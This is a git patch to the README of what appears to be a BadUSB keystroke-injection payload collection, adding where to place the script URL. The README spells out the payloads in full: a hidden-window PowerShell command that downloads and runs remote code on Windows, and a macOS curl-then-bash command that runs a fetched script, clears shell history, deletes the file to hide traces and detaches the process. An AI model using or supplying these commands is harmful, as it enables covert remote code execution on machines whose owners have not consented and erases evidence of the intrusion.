From d14f07167afaf15b21a8c2c9d275cf88dabbabe8 Mon Sep 17 00:00:00 2001 From: msr8 Date: Fri, 7 Oct 2022 16:06:38 +0530 Subject: [PATCH] ecer do --- Payloads/Script Runner/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Payloads/Script Runner/README.md b/Payloads/Script Runner/README.md index 4252ce2..199a454 100644 --- a/Payloads/Script Runner/README.md +++ b/Payloads/Script Runner/README.md @@ -1,8 +1,8 @@ # Script Runner
-**script_runner_win.ino:** Once plugged in, it hits win+r which opens the run menu. Then it types out `powershell -w h iex (irm "[url]")`. Here, `-w h` makes it so the process is ran in a hidden window, `irm "[url]"` sends a request to the url and gets the raw text which is then executed by `iex` +**script_runner_win.ino:** Once plugged in, it hits win+r which opens the run menu. Then it types out `powershell -w h iex (irm "[url]")`. Here, `-w h` makes it so the process is ran in a hidden window, `irm "[url]"` sends a request to the url and gets the raw text which is then executed by `iex`. Put the url to your script at line 19
-**script_runner_mac.ino:** Once plugged in, it hits cmd+space which opens spotlight. Then it types `Terminal.app` and hits enter to open up the terminal application. Then it types out `"$( curl "[url]" > $TMPDIR/16691615; bash $TMPDIR/16691615; history -c; rm ~/.bash_history;rm $TMPDIR/16691615 )" & disown;`, and then it quits the terminal by hitting command+q and then enter (it hits enter because of the "Do you want to terminate the processes in this window" prompt). Here, `curl "[url]" > $TMPDIR/16691615` saved the script to a file, `bash $TMPDIR/16691615` executed the file, `history -c`, `rm ~/.bash_history`, `rm $TMPDIR/16691615` clear our traces, and `& disown` ensures that these processes keep running even if the terminal is exited +**script_runner_mac.ino:** Once plugged in, it hits cmd+space which opens spotlight. Then it types `Terminal.app` and hits enter to open up the terminal application. Then it types out `"$( curl "[url]" > $TMPDIR/16691615; bash $TMPDIR/16691615; history -c; rm ~/.bash_history;rm $TMPDIR/16691615 )" & disown;`, and then it quits the terminal by hitting command+q and then enter (it hits enter because of the "Do you want to terminate the processes in this window" prompt). Here, `curl "[url]" > $TMPDIR/16691615` saved the script to a file, `bash $TMPDIR/16691615` executed the file, `history -c`, `rm ~/.bash_history`, `rm $TMPDIR/16691615` clear our traces, and `& disown` ensures that these processes keep running even if the terminal is exited. Put the url to your script at line 26